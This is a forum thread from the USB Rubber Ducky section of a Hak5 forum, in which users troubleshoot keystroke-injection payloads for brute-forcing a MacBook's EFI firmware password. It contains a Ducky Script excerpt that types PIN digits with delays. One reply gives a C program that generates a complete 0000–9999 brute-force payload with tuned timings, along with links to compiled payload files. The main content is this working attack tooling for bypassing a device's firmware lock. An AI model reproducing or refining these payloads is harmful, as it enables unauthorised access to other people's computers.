Jump to content

[MACOSX] [EFI] Anyone have payload for efi password?

emZe

By emZe
in Classic USB Rubber Ducky

 Share

Recommended Posts

Guest spazi

Guest spazi

Posted
Posted (edited)

Hi emZe, welcome to the forums!

Can you share the payload you are using?

Darren made a similar payload for brute forcing android pins couple of months ago. Hak5 made a video about it on the Hak5 youtube channel. You should look into that :)

www.youtube.com/watch?feature=player_detailpage&v=yoYiEkk5TyI

how long are the mac EFI pin number? It's typically 4 numbers, right?

Do you know if there are any max attempts and if there are any time/wait penalties?

Edited by spazi
Link to comment
Share on other sites
emZe Newbie

emZe

Posted
  • Author
Posted

Hi emZe, welcome to the forums!

Can you share the payload you are using?

Darren made a similar payload for brute forcing android pins couple of months ago. Hak5 made a video about it on the Hak5 youtube channel. You should look into that :)

www.youtube.com/watch?feature=player_detailpage&v=yoYiEkk5TyI

how long are the mac EFI pin number? It's typically 4 numbers, right?

Do you know if there are any max attempts and if there are any time/wait penalties?

Hi,

Thanks for your help...

The payload i use is http://pastebin.com/4x53pkya

i've used many many many others and always the same...

now i test a small one with delay between all numbers and the problem is here too 

DELAY 5000
STRING 1
DELAY 1000
STRING 1
DELAY 1000
STRING 1
DELAY 1000
STRING 1
DELAY 5000
ENTER
DELAY 1000
STRING 1
DELAY 1000
STRING 1
DELAY 1000
STRING 1
DELAY 1000
STRING 1
DELAY 5000
ENTER
DELAY 1000
STRING 1
DELAY 1000
STRING 1
DELAY 1000
STRING 1
DELAY 1000
STRING 1
DELAY 5000
ENTER
DELAY 1000
STRING 1
DELAY 1000
STRING 1
DELAY 1000
STRING 1
DELAY 1000
STRING 1

I think is 4 digits but some peoples say is 6 digits now for mbp a1286 late 2010.

no penalties, no attempts.

Regards

Link to comment
Share on other sites
Guest spazi

Guest spazi

Posted
Posted

I noticed that the script on pastebin has two ENTER commands sometimes. Maybe they shouldn't be there considering that this is a mac EFI you are trying to bruteforce.
I noticed that there is plenty of delays. That's always nice.

maybe you should try writing your own script, without the time penalty delays.
Not sure why it won't work, maybe it's a keyboard thing?

the Rubber Ducky is cross platform compliant, so it should work.

Are you saying that the rubber ducky is only typing one or two numbers and then nothing happens?

Link to comment
Share on other sites
Guest spazi

Guest spazi

Posted
Posted (edited)
the teensy is better than rubber ducky??

I have never tried the teensy, so I can't say. It's probably a great tool though :)

I have never had any problems with the rubber ducky and I've used several payloads on different scenarios.

I've tested it against, OSX, Linux, Windows 7, Ipad IOS, Ipod IOS and android.

Maybe I'm just lucky.

Edited by spazi
Link to comment
Share on other sites
  • 8 months later...
dataghost Newbie

dataghost

Posted
Posted

maybe it's the speed of keypress?

it's possible to change the keypress delay?

for example, for 1234 :

press "1" for 500ms release 500ms

press "2" for 500ms release 500ms

.....

....

you know?

Would you know how to create this script to have the delay between the numbers it's the issue for sure

Link to comment
Share on other sites
  • 1 month later...
belly Newbie

belly

Posted
Posted

hey,

i wrote a small c program to generate a textfile that i translate via online-encoder.

#include<stdio.h>

int main() {

FILE *datei;

datei = fopen("test.txt", "w");

if (datei == NULL)

{

printf("Fehler beim oeffnen der Datei.");

return 1;

}

fprintf(datei, "DELAY 5000\n");

int i;

for(i=0; i<10; i++) {

fprintf(datei, "STRING 0\nDELAY 700\nSTRING 0\nDELAY 700\nSTRING 0\nDELAY 700\nSTRING %i\nDELAY 700\nENTER\nDELAY 12500\n", i);

}

for(i=10; i<100; i++) {

fprintf(datei, "STRING 0\nDELAY 500\nSTRING 0\nDELAY 500\nSTRING %i\nDELAY 1500\nENTER\nDELAY 7500\n", i);

}

for(i=100; i<1000; i++) {

fprintf(datei, "STRING 0\nDELAY 500\nSTRING %i\nDELAY 1500\nENTER\nDELAY 7500\n", i);

}

for(i=1000; i<10000; i++) {

fprintf(datei, "STRING %i\nDELAY 1500\nENTER\nDELAY 7500\n", i);

}

fclose(datei);

return 0;

}

what i realized too is that you have to put in digit by digit, STRING 0001 ENTER is way too fast!

I keep playing around with the different delays, by now my payload is able to run about two hours broodforcing an mbair but then something seems to go wrong cauz it only enters three digits after running two hours... i also realized theres differences between a macbook retina and a macbook air.

i attached the .txt and .bin of my payload - if anyone is in intrested or has an idea i would love to figure out whats the problem!

and a small video of the stick of the ducky starting to attack^^

https://www.facebook.com/video.php?v=10204806167131861&set=vb.1168804757&type=3&theater

so long,

belly

payload (txt): http://www47.zippyshare.com/v/tXyo9I7o/file.html

payload (bin): http://www47.zippyshare.com/v/8OKsSeUy/file.html

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...